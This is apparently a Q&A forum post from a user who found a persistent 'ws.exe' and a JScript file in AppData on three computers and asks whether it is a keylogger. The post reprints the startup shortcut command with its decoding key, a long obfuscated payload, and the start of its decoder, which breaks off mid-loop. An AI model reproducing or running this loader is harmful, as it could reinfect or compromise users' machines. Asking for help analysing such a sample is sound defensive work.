# Found this script plus the exe file in my app data folder. I wonder what does this do. Is this a backdoor script to record my key stroke entry?

Tags: jscript, wsh

I recently found a WS folder with in my app data folder, containing a "ws.exe" file, with a script file in the same folder, also there is shortcut added to my startup folder with below command. I've deleted the entire WS folder plus the start up shortcut but it will come back to my computer in my next reboot. Can anyone help me to analyze this script and let me know what does it do?

This script was found in three of my computers. Right now, for security reason, I've denied access to this folder so startup won't run this script. Please enlighten me. Thank you.

Screenshot of the files in folder:

[image]

shortcut command:

```
C:\Users\Alex\AppData\Roaming\WS\ws.exe /E:jscript /b C:\Users\Alex\AppData\Roaming\WS\ws slq9h7=YRdSBZyGO5TpF0eXKtiW/InJxm41kMHCVr2QLba+N6D8PUvg3ozfwEjcuA
```

The script inside the "ws" folder:

```
var code = 'nC78R7T3tKilyY4Q0UhmOpl+iKIm5XyUWKiHXhj1WCeknqm1evykICH6nqzFW=eb/qR2G6USnC78RYtoZXvoXCzgJXr6ngUmOpl+iKIm5XyUWKiHXhj1WCeknqm10gy8WKlUWXzVBMi2/=eFJKyUiXvOtC2Ht351SFbyqVi4I1lWTMaenKt8n9h85XtmOps1x7iERkbyqVi4I1leek7N5XvOI9lFZ8sjRqdIKqRw952gtKRmekngTCy3IFy3eeipIVyVt3tmOps1IC7kWvE8Bks+Zqo6RkbyqVi4I1l+tklytKnZT3H8J=tmOplXy3i=t3nDZ3neeHd8Ignkn1sLRqnxd8sLRhRgXV7geV2fpH4DZknQSqMw952gtKRm5KeX5XikyFMDJklin8sjR74=ZghopMEPIke8GhIrRVTH/Ks1SpsLRqnIKqIw952gtKRmI3i4ne4Ri7HaXYnXZKnrTpsjR7nFt3d2IYT/RHykICH6nhiv/=DGtXvHRHUw952gtKRmtenO0=jyi=Uot0DZG9MmOplK0gy8WKlUX8dFt3d2IYTGtXvHRHUw952gtKRmIKyQiVn2/eeriV5mOpsDG6USnC78Rhe3tv7qGY7qn0yFt3ZmOps1I=j3iKdPW=eb/qzHJ=01G6USevykICH6n7b10gDHiKs1KpmvZ9s6SFbyqmUS9523W=HbipsrnYdvipMmJ6USRqsmRYT8Jplw95rmRqsmRqsmRYi4I1lLWPHtT=yNeF4FiCEgGFRmOplNeX2aeC4ophrU0X48n8m2G6USRqsmRqsmRqlgtKRmTC5DpC7bG94fp3HoWXrmOplLWPHtT=yNeF4FiCEgGFd/RVy6/=HURHUrXMiBeKegZV5DZM7CSFbyq1smRqsmRqsmnC78R=HgpFlP5FiUJ=ovX7l2iVhmOpl=i97StX6oGY2BJK42WHb6KFbyq1smRqsmRqsmnC78Rh2L5VHQI0mDJY2UIvI8XeeYR9UmTC5DpC7bG94fp3HoWX2/ZeUw95rmRqsmRqsmR=HgpFlP5FiUJ=ovX7l2iVhmOFUjRqd7JqRmd1tmiKi4/q4SWUdzWV7RZK4fnYyKZHHeT8Mw95rmRqsmRqsmR=HgpFlP5FiUJ=ovX7l2iVhmOFUjRqd9/X51RqtCR7T3tKilyY4Q0U7/RHdv/1dnSh2L5VHQI0mDJY2UIvI8XeeYBqs6BqlCtXDPipMw95rmRqsmRqsmR=HCRq42nMM6IUhgnY4+ye45WXiDR9UjOps1TYn+/heoipR2RYbyq1smRqsmRqsmRqsmRYi4I1l6tKTrR9Um5KeX5XikyFMDJklin8sLRhiMZ024/9moJMazJ=HQXPdnG6USRqsmRqsmRqsmRqsmnC78R=yaiqsjRhiMZ024/9moJMazJ=HQXPynRqbmI=7UW9byq1smRqsmRqsmRqsmRYHTFF7ztMdh0g270q4=i97StX6oGY2BJK42WHbDKp6mI=7UWq6mnYdvipMw95rmRqsmRqsmRqsmRqlK0gy8WKlUX8dF/=eHIqdnS9h6Z9s2G6USRqsmRqsmRqsmRqsmeYn4nMhUJ=2F5eb10Ve+RHUrtgvMBqs6BqlCtXDPipMw95rmRqsmRqsmRYUyq1smRqsmRqsmWKidZYylyVTo/ket0=HCIpsjOFUmRHyH/=ipiXvNnC01RqtCRhn+y=dFThvRpUHoT00oees3nv2SSYT8nX02G6USRqsmRqsmRql2i1srWKidZYylyVTo/ket0=HCIpsjOFUmRHe6i=7UieZ1Splw95rmRqsmRqsmRqsmRqlgtKRmI=7UWqsjR74=ZghopMEPIke8GhIrRC76I=T4n=h1SpsLRqnIK7nFK7D3I8Iw95rmRqsmRqsmRqsmRqlz00UDJXdqT7yQTesrTC5DpC7bG94fp3HoWX2/ZeUbRYl4n=mbRYT8nX02G6USRqsmRqsmRqsmRqsmWXtmSYtoZXvoXCzgJXr6ngv/RCi2/=eHJ=HPnYZ1Kp46tKTrSpMmJ6USRqsmRqsmRqsmRqsmRqsmRYi4I1lb/Ca5tKTrR9UmXhtPtF4SFPy8yKRoT8m1tKl6i=7UtpR2RqbmdvDIFXHkICjP/giUK7DKWXzM/3nPK7DFn=78nqlyiXzvK7D5ICjVIC7aIvDI03T4IVTvI7DIn3Z+/=zLdPbyq1smRqsmRqsmRqsmRqsmRqlgtKRmevyHJ=0mOpltTky4Gh2OZ3RvIk4YSqd4IYlMtKT4R1MmS8sVK7DK0vDIn3Z+iK4HdPbyq1smRqsmRqsmRqsmRqsmRqlgtKRmtKdVI8sjRqRNt1sNiF2QIgy8WKlUR761R1sLRYl4n=mmS8s1KqRmR1sLRhiMZ024/9moJMazJ=HQXPdnG6USRqsmRqsmRqsmRqsmRqsmRhy8iX7Ui0D+W84K0geoip6mtKdVI86m/=zL0=7UWqMw95rmRqsmRqsmRqsmRqsmRqsmevykICH6n7b10gDHiKs1Kp4DIg2CngHaeX4CnqsQRqmDZ9s6SpMw95rmRqsmRqsmRqsmRqsmRqsmeYn4nMhUJ=2F5eb10Ve+RHUrRH61R1sLR7nFiK4HRqbmRH61R1sLRqRmR1sLR=78i3ZbR9sbR=i4/YyHSFbyq1smRqsmRqsmRqsmRqsmRqlK0gy8WKlUX8dTnXHURHUrZqMw95rmRqsmRqsmRqsmRqlj95rmRqsmRqsmRYUyq1smRqsmRqsmnYdzRYbyq1smRqsmRqsmRqsmR7lfGY7l0CiFFY7Pi0HZnXyXSqMw95rmRqsmRqsmRYUmtg7UtgmmS=eHI1MmJ8lj95rmRqsmRqsmR7nFt3d2IYT/RHybiXe6RHUrZFs6ZqMw95rmRqsmxplktKTkWqsriKd8I8MmJ6US95ryq1smRqlj95ryqVUyqmUS952CnXzkn=HN/1l9ICe4n=eZ/Cbrn=78igeUBql4ICnPBql6tKTrSplw95rmRqsmnC78RYyriXDbR9Um/Ce3Rh7kn=Hgie4OtC2Ht35rRHnFt3d2IY5+0g4H/=61SFbyq1smRqlgtKRmIg4NIVTknK5mOplPW=eb/qz9ICe4n=eFW=j8n=yvnq46tKTrSFbyq1smRqlPW=j8n=yvnqz0tKdViKT5tKTrR9Umn=78igeUG6USRqsmRYyr/3dUt3eUBM78i3eaiXzUI8sjR=78i3Zw95rmRqsmIg4NIVTknK5+0g7gipm2G6USx5US95ryqCiv/CyUWXj+R=jeWCvXWY4RpkTTWYd3S=76nFiQIga1G9HfyKe+igZbR=HQnXzDyC0vWKi2/XHaJpMmJ6USRqsmRYi4I1llIY0gWVyLtkmzJkev/CnkR9Um/Ce3Rh7kn=Hgie4OtC2Ht35rRMv2t3dNIgjCnqztF0DRe7T5R1Mw95rmRqsm5KlvyC2PWgRoGKrvnXzVtvb1/3lH/1dnSqd5Fvy0R16mRC4UnYsfB8j4I=M+tC7kWge+iqvkW=7UBCyN/pjk/gz+iXyUR16miC7bIg02G6USRqsmRYi4I1ldZVyvigyf/XDfGXdrJXRmOplViKTeIge85XnH/V5rSFbyq1smRqllIY0gWVyLtkmzJkev/CnkX8dFiKTpiK7viKyUp=e4i=e8RHUrRHmaeKyHI1vlige+n9r1BqldZVyvigyf/XDfGXdrJXR2G6USRqsmR=HQnXzDyC0vWKi2/XHaJpsCd1llIY0gWVyLtkmzJkev/CnkX8dFiKTpiK7viKyUp=e4i=e8RHUrRHma/CjUWXizG1RbR=HQnXzDyC0vWKi2/XHaJpMw95rmRqsm5KlvyC2PWgRoGKrvnXzVtvb1Ige+iqdnS=76nFiQIga1G9HfyKe+igZ2G6USRqsmRYdHnYe8/1llIY0gWVyLtkmzJkev/CnkX8d8iKy6/gzPiKTHJY51KFbyqVUyqmUS95ryqCiv/CyUWXj+R=nHn7ePiKdlige+nqm2RYbyq1smRqlgtKRmW02v/VhgiFe2nCHaWXvzG6USRqsmRYtoZXvoXCzgJXr6ngv/RCi2/=eHJ=HPnYZ1Kp4tTky4Gh2OZ3RvIk4YSqdKWXzMWKR1SpsLRqdIKhv2t3dNIgjCnqzGTeTIKhi8tXvHngj8WvDInkR+ZqovZ9I8yvDInCdkBCeoipR2R9EmW02v/VhgiFe2nCHaWXvzR9UmRHH708RmG1l2pVe+IFiHyXHgWXv2/KMmOps1FME1G6USRqsmRYdHnYe8/1l+tklytKnZT3H8J=tmS8leek7N5XvOI9lFZ8sLRYioe07qT3TC0Fnqy84tTky4Gh2OZ3RvIk4YSqd9FUv5eeT70MzlF001SpMmS8leek7N5XvOI9lFZ8sLRYioe07qT3TC0Fnqy84tTky4Gh2OZ3RvIk4YSqde0UepFM7yTpR2SpsLR7eXZXjl/0j6Z7ZPRqbmnV4e50dYn=iTyUR3S=HLGX4tWhoDZeRrSpMmS8s1R7b1Rqbm09H0TKTvyPnZ5UzUTqm2RqbmRHU1RqbmeetD/U7aF3s60PZmS8lgJ7el5MnUiHh35kIre=vqnCHgikyKngroeFnGJH2rSqM2RqbmeetD/U7aF3s60PZmS8l2pVe+IFiHyXHgWXv2/KMmS8leek7N5XvOI9lFZPbyqVUyqmUS952CnXzkn=HN/1ltTky4Gh2OZ3RvIk4YS7doeF4D/gaLWk58Wge3/=nzSplw95rmRqsmICeUnKd+R7T3tKilyY4Q0U7/RMeoI=7+ihe+nCH8/gzaiXzU03T8WXzVI8dnSqIHd8sLR7doeF4D/gaLWk58Wge3/=nzRqbmd80VSFbyqVUyqmUS952CnXzkn=HN/1lqyH2DnHifJM2tIFR3W1m2RYbyq1smRqlgtKRmW02e/VhgiFe2nCHaWXvzR9UmTgeUFgdQiXyUSqd3WXzaigvUIPr1Seb1pXzPn=7+tgePFgt1Kpm1ngH+ZPdx/=jVWXy4/=T2Igb1SFbyq1smRqlgtKRmtUnqG9H+WgeoWg5mOpl+iKImTXzv/Xe8tKTNI142pHe+IFiHyXHgWXv2/KM2G6USRqsmR=iNI1srG8s4tUnqG9H+WgeoWgT/RC7UTXzMRHUrSFbmtUnqG9H+WgeoWgT/RCvNnCeGiK4URHUrSpMmJ6USRqsmRqsmRqlgtKRmWFdFeXnkJCvbJkH1WYH1R9UmtUnqG9H+WgeoWgT/RCHUiXU1Kpm2G6USRqsmRqsmRql8iKTvIComWFdFeXnkJCvbJkH1WYH1X8dg/gDv/XePiKd2tXD+nXv1iKR1KFbyq1smRqsmRqsmtVdHtXbw95rmRqsmx5USx5US95ryqCiv/CyUWXj+R=HLGX4tWhoDZeRrSplw95rmRqsmnC78RhyY5kmz/CaHJ=aMR9UmTgeUFgdQiXyUSqd3WXzaigvUIPr1Seb1pXzPn=7+tgePFgt1Kpm1egH+ZPdxF3lHIC7UWXzV03HPn=eaR1Mw95rmRqsmnC78R7dteF4D/gaLWk58Wge3/=nzR9Um/Ce3Rhe+nXvHIC7U/3Rr5UnqG9H+WgeoWg52G6USRqsmR=iNI1srG8s40H4eGY7NWgaQy9dLiKnbi3H/RC7UTXzMRHUrSFbm0H4eGY7NWgaQy9dLiKnbi3H/RCvNnCeGiK4URHUrSpMmJ6USRqsmRqsmRqlgtKRm5eleyC2PWgRoGKrvnXzVt8sjR7dteF4D/gaLWk58Wge3/=nzX8d2n=eaRHUrSFbyq1smRqsmRqsmICeUnKd+Rh75eFiQIga1G9HfyKe+igy/RMy4IYT2/go1KFbyq1smRqsmRqsmtVdHtXbw95rmRqsmx5USx5US95ryqCiv/CyUWXj+R7szeheUnFI3FhyGnh5rSplw95rmRqsmICeUnKd+RhnHnhj1WCeknqm1ngH+/XnanYZfICjNn7DItgHankRfegH+ZPdx0YdNtgePIgj8OpnkIY06d8R2X8dli=T8iKyPegHMn=m1KFbyqVUyqmUS952CnXzkn=HN/1lViKT7/C7gS=76nFiSIga1G9HfyKe+igZ2RYbyq1smRqlgtKRmpX2vFVhgiFe2nCHaWXvzR9UmWXnGXFTZIPnzFgh8J0Rziq44IY0gpVyLtkmzJkev/CnkSeb1I3e1I3T8RHUrZ86mZ1Mw95rmRqsmnC78RhM8I3eYt32a/YrztC4zt1sjRqde/Ca+/3n+Rkbyq1smRql2i1srShHQn0zDyC0vWKi2/XHaJpsjOpsVZFsVSplExqsrpX2vFVhgiFe2nCHaWXvzR9UjRqIDZpI2SplwRhM8I3eYt32a/YrztC4zt1sjRqd7/C71/=eMR1lj95rmRqsmiXDPipl2i1srShHQn0zDyC0vWKi2/XHaJpsjOpsVZ9sVSplExqsrpX2vFVhgiFe2nCHaWXvzR9UjRqI6ZpI2RYDERq4dWVeGIFiHyXHgWXv2/KMmOFUmdPR6d8MmxY6mShHQn0zDyC0vWKi2/XHaJpsjOpsVZkhVSpMmJ8ldZVyvTgyf/XDfGXdrJXRmOps1T=HPtXdbiX51RYUyq1smRql8iKTvICompFdPn0nkJCvbJkH1WYH1G6USx5US95ryqCiv/CyUWXj+R7lfGY7l0CiFFY7Pi0HZnXyXSqMmJ6USRqsmRYi4I1l2ZVyeTgyf/XDfGXdrJXRmOps1ZFdvXXd=phaGtVdS0=jRyPikWK7zWFyZWhdH07eVGY43epRw95rmRqsmnC78R7doeF4T/gaLWk58Wge3/=nzR9UmRklo5ksUyky=ikIUyknhGFyhykeMZksPG=tgy9mPi0iq5X0otk4hG=i1ipRw95rmRqsmnC78RhyV5kmzFCaHJ=aMR9UmRV7fiCnM/C7kyXb8tXvCGXbvJFHDtFIgJV4fJkTHW37+JKHfygDMtFeoy8Rw95rmRqsmnC78RYdoeF4T/gaLWk58Wge3/=nzR9UmRky900ov0=4lnXnlFHT5egd5TV48Fh47XKdo/H2kTe7reHh1G6USRqsmRYi4I1lkTURoG0zLiK4LiqsjRqd1tP7Dn9iMWC7DnXrvnYiPyVionYdDZCUUIPevJ=2vi=aLyFtvIP4UJXI1G6USRqsmRYi4I1l9TgRoG0zLiK4LiqsjRqd0T=aFT3lTI0y5tCaFnXaC5e2CGFdLIV2aIHh8iC4gG0nTRkbyq1smRqlgtKRm5elvyM2PWgRoGKrvnXzVt8sjRqd1/CRDG=nvIChUWY08ygifiFM6JYiz/YM3/KnCngD3Z=bPW3y8t3moIkt1G6US95rmRqsmnC78R=M80veYt32a/YrztC4zt1sjR7nFt3d2IYT/RMy8iX7Ui0j1WCeknqdnSqdrn=vbiCHbipR2G6USRqsmRYi4I1l+0H47iFTryX42ngn2R9UmWFdFe0nkJCvbJkH1WYH1X8d6tKdH/VTKWXzM/3I1Keb1tgD2I=dNtKdMT=7UtpdnX8dViKThtKT4RHUrRVTHJY51Seb1ICe6/=7kipdnSqjJKYZLx7DPS85Ni86md8I2G6US95rmRqsmnC78RhM8IveYt32a/YrztC4zt1sjRqjJXPhPKea4BXaaBK2lB04SB0z5BerDBFHnJPRvB9ZUxp5NiPbyq1smRqlgtKRmFVdtTX0UW9erWKnVWpsjRhM8IveYt32a/YrztC4ztHb1n=ePnqdnS=zpXheHy=mvW=H3igM2G6US95rmRqsmnC78Rh76eFiSIga1G9HfyKe+igZmOpsNKkloXghaiMhaTksaGevwy9ljdqjVG6USRqsmRYi4I1l2WHeGIFiHyXHgWXv2/KMmOpllI70gpVyLtkmzJkev/CnkX8dUiKyURHUr/HdtTX0UW9erWKnVWpMw95ryq1smRqlgtKRmteleyM2PWgRoGKrvnXzVt8sjRqjJSq41WKTk/gH+tg7PWYD1tg48iXnEtCyrn=ePnqMfSFErIKD6Sea4BKr6BFHnJP5Dxp5NiPbyq1smRqlgtKRm/VdtTX0UW9erWKnVWpsjR=75eFiSIga1G9HfyKe+igy/RVTHI351Kp4+0H47iFTryX42ngn2SFbyqmUSRqsmRYi4I1l8X70o0XjLWgrUZCaHngDVJpsjRqjJXvTnKYnwZPyjdqjVG6USRqsmRYi4I1lG0V47iFTryX42ngn2R9UmIH4eG77NWgaQy9dLiKnbi3H/RVTHI351Kp4+0H47iFTryX42ngn2SFbyqmUSRqsmRYi4I1ldWHeGIFiHyXHgWXv2/KMmOpsNKHD1S=dkS9srXg7kBX4QBXz6BKr6Z1UzKKbPGKvEXg7kBX4QBXz6BKr6Z1UzKKbvGKU2x97/tXZaW=ra/VsaJks8BFHnJPmbG9njSKD/ZFynXghaWgUaJMhaphraFHsaXkhaGevwZk0bZPejSeD1dqjVG6USRqsmRYi4I1l4I70gpVyLtkmzJkev/CnkR9UmpX2eFVhgiFe2nCHaWXvzX8dUiKyURHUr/HdtTX0UW9erWKnVWpMw95ryq1smRqlgtKRmpFdFn0nkJCvbJkH1WYH1R9UmBvz/tCz1KeD3JP5Dxp5NiPbyq1smRqlgtKRmtgnqG9HGWgeoWg5mOpldZHyvTgyf/XDfGXdrJXd/RVTHI351Kp4+0H47iFTryX42ngn2SFbyqmUSRqsmR=iv/CyUWXj+R=iv/CZrtp6mt16mt86miq6mip6mi1MmJ6USRqsmRqsmRql8iKTvIComtp41BqlkBqlMBqlHBqlCSFbyq1smRqlj95ryq1smRqlCnXzkn=HN/1l+ip4dpHeGIFiHyXHgWXv2/KMbRhyY5kmzFCaHJ=aMSplw95rmRqsmRqsmRYdHnYe8/1ldpHeGIFiHyXHgWXv2/KMmRFUm5UnqG9HGWgeoWg5w95rmRqsmx5US95rmRqsmiVe+t3T2/gomtgj+tg7UShHQnXzTyC0vWKi2/XHaJp6m5KlvyC2FWgRoGKrvnXzVt8MmJ6USRqsmRqsmRql8iKTvICompX2v/HhgiFe2nCHaWXvzRqbm5KlvyC2FWgRoGKrvnXzVtPbyq1smRqlj95ryq1smRql2i1srFVdtTX0UW9erWKnVWpsCd1sr/HdtTX0UW9erWKnVWps4Opl2ZVyeTgyf/XDfGXdrJXR2Splw95rmRqsmRqsmR=HCRq4CnXzkS7TtivrvWMtDieMoJhj=Bql+0H47iFTryX42ngn2X8dU/UDNnge85g7PipdnSqMbRqRPR1M2R=zHS=zpXheHy=mvW=H3igMbRYdoeF4T/gaLWk58Wge3/=nzSpsCd1lCnXzkSh4Qe=dT5XzD0ViHTMtbRYdoeF4T/gaLWk58Wge3/=nzSFbyq1smRqsmRqsmiXDPiplCnXzkS7TtivrvWMtDieMoJhj=Bql+0H47iFTryX42ngn2X8dU/UDNnge85g7PipdnSqMbRqd1t8R2R9Em/C0r/HdtTX0UW9erWKnVWp6mtUnqG9HGWgeoWg52RqtCR=iv/CZrp=20tH7l/V7pnCe=T16mtUnqG9HGWgeoWg52R9rmiVe+t84RWHT1007+Iedgi0i=Bql2ZVyeTgyf/XDfGXdrJXR2G6USRqsmRqsmRqlCnXzkS=jeWCvXWY4RpkTTWYd3BqsVd86mtgj+tg7USqdktMd7phj+/=H+ipU1Bql+0H47iFTryX42ngn2SpMw95rmRqsmxplH/YyHRYbyqmUSRqsmRqsmRql2i1srWX2eFVhgiFe2nCHaWXvzRqtCR=zHS=zpXheHy=mvW=H3igMbR7doeF4T/gaLWk58Wge3/=nzSpMmiVe+t84RWHT1007+Iedgi0i=BqlpJ70o0XjLWgrUZCaHngDVJpMbR=iv/CZr/veQ/eirJh4Sy77rIVIbRqIVBqlk/gzktK5rRCy15MeRFgzbWXzHBpRbR=zpXheHy=mvW=H3igM2SFbyq1smRqsmRqsmiXDPiplw95rmRqsmRqsmRqsmRql2i1sr/VdtTX0UW9erWKnVWpsCd1l+ip4+0H47iFTryX42ngn2Bql9iURoG0zLiK4LiqM2R=iv/CZrp=20tH7l/V7pnCe=T16m5gnqG9HGWgeoWg52BqlCnXzkS=jeWCvXWY4RpkTTWYd3BqsVd86mtgj+tg7USqdktMd7phj+/=H+ipU1Bql+0H47iFTryX42ngn2SpMw95rmRqsmRqsmRqsmRqlH/YyHRYbyq1smRqsmRqsmRqsmRqsmRql2i1srtKleyM2PWgRoGKrvnXzVt8sCd1l+ip4+0H47iFTryX42ngn2Bql2ZVyeTgyf/XDfGXdrJXR2SplCnXzkS7TtivrvWMtDieMoJhj=Bql+0H47iFTryX42ngn2X8dU/UDNnge85g7PipdnSqMbRqd1t8R2R9Em/C0r/HdtTX0UW9erWKnVWp6mtUnqG9HGWgeoWg52RqtCR=iv/CZrp=20tH7l/V7pnCe=T16mtUnqG9HGWgeoWg52R9rmiVe+t84RWHT1007+Iedgi0i=Bql2ZVyeTgyf/XDfGXdrJXR2BqlCnXzkS=jeWCvXWY4RpkTTWYd3BqsVd86mtgj+tg7USqdktMd7phj+/=H+ipU1Bql+0H47iFTryX42ngn2SpMw95rmRqsmRqsmRqsmRqsmRqsmiXDPiplw95rmRqsmRqsmRqsmRqsmRqsmRqsmR=HCRq4G0V47iFTryX42ngn2RqtCR=zHS=zpXheHy=mvW=H3igMbRhyYtkmzFCaHJ=aMSpMmiVe+t84RWHT1007+Iedgi0i=Bql9TgRoG0zLiK4LiqMbR=iv/CZr/veQ/eirJh4Sy77rIVIbRqIVBqlk/gzktK5rRCy15MeRFgzbWXzHBpRbR=zpXheHy=mvW=H3igM2SFbyq1smRqsmRqsmRqsmRqsmRqsmRqsmiXDPiplkiURoG0zLiK4LiqsCd1l+ip4+0H47iFTryX42ngn2Bqll0Y0gpVyLtkmzJkev/CnkSpsCd1sriVe+t84RWHT1007+Iedgi0i=Bqll0Y0gpVyLtkmzJkev/CnkSp6miVe+t84NeX2aeC4ophrU0X48n86md8IbR=yN/Cy4nqm1tgdqT04O/CD2/C0aR16m/HdtTX0UW9erWKnVWpM2SFbyq1smRqsmRqsmRqsmRqsmRqlj95rmRqsmRqsmRqsmRqlj95rmRqsmRqsmRYUyqmUSRqsmRYUyqmUSx5US95ryqCiv/CyUWXj+R=HVFHMUFYZ3J0j4ZVHqGX5rFHdti00UW9erWKnVWpMmJ6USRqsmRYdHnYe8/1sVZYmVRqbmFHdti00UW9erWKnVWpzU/vyUICH+i8mDy1M+n=jeIYlHIMy4Ig0rSFbyqVUyqmUS952CnXzkn=HN/1l0/0dgWKiCZvn3Wk4eyUzfXCmrSplw95ryq1smRqlgtKRmtUn1G9HGpgeoWg5w95rmRqsmnC78RhyVtkmzFMaHJ=aMR9UmXvUw95rmRqsmnC78RYdtnF4TFgaLWk58Wge3/=nzR9UmRVn2/CvV/KTPGHDIK7Db/gy4/=4NI3TIKYdN/3TIKYyHt3e8WKTztge+n=e8RkbyqmUSRqsmRYT8Jplw95rmRqsmRqsmR=yYtkmzFMaHJ=aMR9UmTgeUFgdQiXyUSYdtnF4TFgaLWk58Wge3/=nzSeb1pXzPn=7+tgePFgt1Kpm15XzUWei2IVeP0YdNiYeknqR2G6USRqsmRqsmRqlgtKRm0V4vG77OWgaQy9dLiKnbi3MmOpl+iKImTXzv/Xe8tKTNI14kTgRoG0zBiK4LiqMw95rmRqsmRqsmR=iNI1srG8s40V4vG77OWgaQy9dLiKnbi3H/RC7UTXzMRHUrSFbm0V4vG77OWgaQy9dLiKnbi3H/RCvNnCeGiK4URHUrSpMmJ6USRqsmRqsmRqsmRqsmnC78Rhz8Jhe7y=mvW=H3igMmOplpJY0o00jLWgrUZCaHngDVJeb1WKTH/pdnSqMw95rmRqsmRqsmRqsmRqlgtKRmW02vFHhgiFe2nCHaWXvzR9UmFVdoT00UW9erWKnVWeb1T=HPI=D4J0z4/X01KFbyq1smRqsmRqsmRqsmRhyVtkmzFMaHJ=aMX8d6nKyrRHUrW02vFHhgiFe2nCHaWXvzRqbmR1l/R1sLR=nHnhe+tKtrFVdoT00UW9erWKnVWeb1IYdNiYekn7yUtKTHRHU2RqbmRHU1SFbyq1smRqsmRqsmx5USRqsmRYUmtg7UtgmmS7doeF4TFgaLWk58Wge3/=nzSplwRYUyqmUSRqsmR=HCRq42pVeG0FiHyXHgWXv2/KMmRFUjRqIVSplw95rmRqsmRqsmRYdtnF4TFgaLWk58Wge3/=nzR9UmSYdtnF4TFgaLWk58Wge3/=nzRqbmdPRVSFbyq1smRqsmRqsmnYdzRYbyq1smRqsmRqsmRqsmR=yYtkmzFMaHJ=aMR9UmTgeUFgdQiXyUSYdtnF4TFgaLWk58Wge3/=nzSeb1pXzPn=7+tgePFgt1Kpm15XzUWei2IVeP0YdNiYeknqR2G6USRqsmRqsmRqsmRqsm0V4vG77OWgaQy9dLiKnbi3MmOpl+iKImTXzv/Xe8tKTNI14kTgRoG0zBiK4LiqMw95rmRqsmRqsmRqsmRqlC/3RmS9bmRedonF4TFgaLWk58Wge3/=nzX8d4nhe+iqdnSqMwR7donF4TFgaLWk58Wge3/=nzX8da/3iHFCeonqdnSqM2RYbyq1smRqsmRqsmRqsmRqsmRqlGIV47TFTryX42ngn2R9Um0V4vG77OWgaQy9dLiKnbi3H/RCHUiXU1Kpm2G6USRqsmRqsmRqsmRqsmRqsmR=HSn0zTyC0vWKi2/XHaJpsjRhz8Jhe7y=mvW=H3igH/RMT2I3lbtKHGtXvHRHUw95rmRqsmRqsmRqsmRqsmRqsm5gn1G9HGpgeoWgT/RVlvIgm1Kp42pVeG0FiHyXHgWXv2/KMmS8s1R7b1RqbmigeUTXz4n14GIV47TFTryX42ngn2X8d6ICjMnXyU03T4n=01KpMmS8s1KpR2G6USRqsmRqsmRqsmRqsmx5USRqsmRqsmRqljR=y4n=yrRq4dWHeG0FiHyXHgWXv2/KM2RYbmx5USRqsmRYUmiXDPiplwRYUyqmUSRqsmRYi4I1l+0V47TFTryX42ngn2R9Um5gn1G9HGpgeoWgT/RC2NWXo1Kpm1Rq6mR1Mw95rmRqsmICeUnKd+R=zpJhe7y=mvW=H3igMw95ryqVUyqmUS952CnXzkn=HN/1lgJ7el5MnUiHh35kIrpFdPnXnkXCvbJkH1WYH1Splw95rmRqsmnC78Rhz8J=eHyhmvW=H3igMmOpldZVyvigyW/XDfGXdrJXd/RCyrtKdlnqdnS9s2X8dU/ve6I=e85g7PipdnSqMmS8ldZVyvigyW/XDfGXdrJXd/RVybWXyHRHUrZpMw95rmRqsmICeUnKd+Rhz8J=eHyhmvW=H3igMmOplGIV4HiFTRyX42ngn2X8d8iKlbtXyHRHUrRHDIR16md8I2BqlGIV4HiFTRyX42ngn2G6USx5US95ryqCiv/CyUWXj+Rh4Qe=dT5XzD0ViHTMtr/VdtTX0Up9erWKnVWpMmJ6US95rmRqsmiVe+t3T2/gom/CeHS7doeF4T/UaLWk58Wge3/=nzBqlGIH47iFTRyX42ngn2Splw95rmRqsmRqsmRYdHnYe8/1lpJ70o0XjBWgrUZCaHngDVJps4OFUmFVdtTX0Up9erWKnVWFbyq1smRqlj95ryq1smRqlCnXzkn=HN/1lk/gzktK5rpX2v/HhgiFe2nCHaWXvzBqllIY0gWHyLtkmzJkev/CnkSplw95rmRqsmRqsmRYdHnYe8/1ldWVe+0FiHyXHgWXv2/KMmS8llIY0gWHyLtkmzJkev/CnkG6USRqsmRYUyqmUSRqsmRYi4I1llI70gpVyBtkmzJkev/CnkR9UmWXbzW74rFkhD01m2G6USRqsmR=zHip4lI70gpVyBtkmzJkev/CnkX8d2/CTHJhjCRHUrRHn2/CTNn3ZmZFs1Sp6mBFh2R9EmeYn4nMhUJ=2F5eb10Ve+RHUrtgj+tg7US=yN/Cy4nq4k/gzktK5rTKnk00RoI0dv5vykI86mR1lPtgRmKqR1Sp6m/VdtTX0Up9erWKnVWpMbRqdIR1R2Bqs6BqlCtXDPipMmG1l0ng7g5FToWHylX8dpnXo1Kp4k/gzktK5rtgj+tg7USqdk/X5+iK4HRqjkR=ekW=jEIgeURqj6OpRbR=z8XheHyhmvW=H3igM2Bqs1x=ybWKs1Sp6mZq6miC7bIg02G6US952j95ryqmUSiVe+t3T2/gome74VXkeQTk7HXF4oFUtr0H4eG77NpgaQy9dLiKnbi3MbRh75eFiSIUa1G9HfyKe+igZ2RYbyqmUSRqsmRYdHnYe8/1sr0H4eG77NpgaQy9dLiKnbi3H/RCD4I3Td/CTHJhjCRHUr5eleyM2PpgRoGKrvnXzVt86mZqMmOFUmZqMw952j95ryqmUSiVe+t3T2/gomTgoUtHyhF04BpK47TF4e09n3XMrr5gn1G9H+WUeoWg52RYbyqmUSRqsmR7T3tKilyY4Q0U7/RHdv/1dnShe3tv7qGY7qn0yFt3ZmS8s1R=TH/qsVR1sLRYygtKetp=Ti/e43ek73Wh0mS8s1d8RbR9sbR=i4/YyHSFbyq1smRql9igRoGXzLTK4LiqsCd1lK0gy8WKlUX8dTnXHURHUrZpMw952j95ryqmUSiVe+t3T2/gomJe7yZKH15MTFWMe5ShyYtkmz/Ca7J=aMBqll0Y0gWVyBtkmzJkev/CnkBqldpVe+IFi7yXHgWXv2/KM2RYbyq1smRqlgtKRmtgvMR9UmTKnk00RoI0dv5vykI8sLRqRmBen2/CTNnvyUJXDHRh42i=TH/1sa5gja/X7+iqlIR1TKiXd9/=HH/V5mOplGiKIaFgdQiXyUR7yzI3TH/pzGiK5+ege15gD2iXzUG8sMege15gD2iXzUBMTNngzb/g7MTCHbipmVR1sLRhyYtkmz/Ca7J=aMRqbmR1Ibd8RmS8ll0Y0gWVyBtkmzJkev/CnkRqbmR1I2KqR1G6USRqsmR7T3tKilyY4Q0U7/RHdv/1dnS=yaiq6mZq6mp02v/VhgTFe2nCHaWXvzSFbyqVUA';

try {
    if (!WScript.arguments(0)) {
        WScript.Quit(0);
    }
    var key = WScript.arguments(0);
    var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var dcode = "";
    for (var i = 0; i < code.length; i++) {

        for (var x = 0; x < keyStr.length; x++) {

